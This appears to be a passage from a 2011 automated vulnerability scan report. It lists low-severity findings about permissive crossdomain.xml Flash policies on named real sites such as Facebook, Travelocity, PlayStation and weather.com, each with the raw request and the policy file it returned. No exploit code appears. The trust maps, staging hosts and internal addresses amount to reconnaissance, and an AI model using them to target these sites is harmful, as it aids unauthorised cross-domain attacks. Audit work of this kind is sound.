<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.75. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Sun, 15 May 2011 20:27:09 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.76. http://travel.travelocity.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://travel.travelocity.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: travel.travelocity.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:30:05 GMT
Server: Apache
Last-Modified: Thu, 07 Apr 2011 16:03:28 GMT
ETag: "14376-6a3-3ffcb400"
Accept-Ranges: bytes
Content-Length: 1699
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
    SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.travelocity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.travelocity.com"    secure="false" />
...[SNIP]...
<allow-access-from domain="i.travelocity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.travelpn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="i.travelpn.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="i.travelocity.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="travelocityf.download.akamai.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="ag.travelocity.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="hg.travelocity.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="design.int.travelocity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="ad.*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dotomi.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sabre.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ach.travel.yahoo.net" secure="false" />
...[SNIP]...
<allow-access-from domain="travelrewardspn.capitalone.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.travelocity.com" secure="true" />
...[SNIP]...
<allow-access-from domain="a248.e.akamai.net" secure="true" />
...[SNIP]...
<allow-access-from domain="fr.travelocity.ca" secure="false" />
...[SNIP]...

6.77. http://travel.usatoday.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://travel.usatoday.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: travel.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 15:11:34 GMT
Accept-Ranges: bytes
ETag: "226a727a2bccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:34 GMT
Connection: close
Content-Length: 1507

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...

6.78. http://webassets.scea.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://webassets.scea.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: webassets.scea.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Date: Sun, 15 May 2011 20:27:01 GMT
Content-Length: 4479
Content-Type: text/xml
ETag: "1ce49f2-117f-49aeb16104640"
Expires: Sun, 15 May 2011 15:50:32 GMT
Last-Modified: Fri, 28 Jan 2011 17:06:25 GMT
Accept-Ranges: bytes
Server: Level-3 Origin Storage/1.5
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<allow-access-from domain="*.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secureus.playstation.com"/>

<allow-access-from domain="fp.scea.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp-stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="repl.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp-repl.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.local.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="local.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa-fp-repl.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa-fp-stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="repl.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.stage.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="sp-int.beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.sp-int.beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.www.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="sp-int.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.sp-int.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta33.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta43.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta45.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta33.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta43.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta45.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.littlebigworkshop.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.littlebigworkshop.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.www.littlebigworkshop.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stagea.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="proda.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodb.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.191.161" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.191.162" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.191.175" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.159.215" secure="false"/>
...[SNIP]...
<allow-access-from domain="173.203.129.45" secure="false"/>
...[SNIP]...
<allow-access-from domain="playstation.stage.lithium.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="boardsus-stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="boardsus.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="gap.opencirclecorp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="rls.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ogs.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="np.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage-webassets.scea.com" secure="false"/>
...[SNIP]...

6.79. http://wow.weather.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wow.weather.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wow.weather.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:52 GMT
Server: Apache
SVRNAME: web2x01
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2057
Keep-Alive: timeout=1, max=7463
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.weather.com" />
<allow-access-from domain="*.epicmashup.com" />
<allow-access-from domain="showcase.weather.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.imwx.com" />
<allow-access-from domain="*.rga.com" />
<allow-access-from domain="*.jnj.com" />

<allow-access-from domain="*.zyrtec.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.gigyahosting.com" />
<allow-access-from domain="*.gigyahosting1.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="adportal.pointroll.com" />
<allow-access-from domain="*.ge.com" />
<allow-access-from domain="*.inbcu.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="devworks.ivillage.com" />
<allow-access-from domain="devi.ivillage.com" />
<allow-access-from domain="i.ivillage.com" />
<allow-access-from domain="www.ivillage.com" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.tvpdigital.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="apps.eyewonderlabs.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="fjpecvaa.joyent.us" />
<allow-access-from domain="widget.bravotv.com" />
<allow-access-from domain="*.jwtdev.com" />
<allow-access-from domain="*.jwtweb.com" />
<allow-access-from domain="*.na.jnj.com" />
<allow-access-from domain="*2mdn.net" />
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...

6.80. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.99.38
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.81. http://www.fingerhut.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.fingerhut.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fingerhut.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 21 Sep 2010 21:58:02 GMT
Accept-Ranges: bytes
Content-Length: 430
Content-Type: text/xml
X-N: S
Date: Mon, 16 May 2011 01:32:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="convertlanguage.com"/>
   <allow-access-from domain="*.convertlanguage.com"/>
   <allow-access-from domain="fingerhut.com"/>
   <allow-access-from domain="*.fingerhut.com"/>
...[SNIP]...

6.82. https://www.fingerhut.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fingerhut.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 21 Sep 2010 21:58:02 GMT
Accept-Ranges: bytes
Content-Length: 430
Content-Type: text/xml
X-N: S
Date: Mon, 16 May 2011 01:37:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="convertlanguage.com"/>
   <allow-access-from domain="*.convertlanguage.com"/>
   <allow-access-from domain="fingerhut.com"/>
   <allow-access-from domain="*.fingerhut.com"/>
...[SNIP]...

6.83. http://www.mcafeesecure.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mcafeesecure.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mcafeesecure.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
Cache-Control: private
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 01:38:53 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.84. https://www.mcafeesecure.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.mcafeesecure.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mcafeesecure.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
Cache-Control: private
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 01:37:35 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.85. http://www.telegraph.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.telegraph.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.telegraph.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
ETag: W/"1150-1304607406000"
Last-Modified: Thu, 05 May 2011 14:56:46 GMT
Content-Length: 1150
Content-Type: application/xml
Date: Mon, 16 May 2011 01:19:33 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="telegraph.co.uk"/>
<allow-access-from domain="*.telegraph.co.uk"/>
<allow-access-from domain="telegraphquiz.cfmx.flarecreative.com"/>
<allow-access-from domain="213.187.32.58"/>
<allow-access-from domain="213.187.48.185"/>
<allow-access-from domain="tgquiz.pavo.flarecreative.com"/>
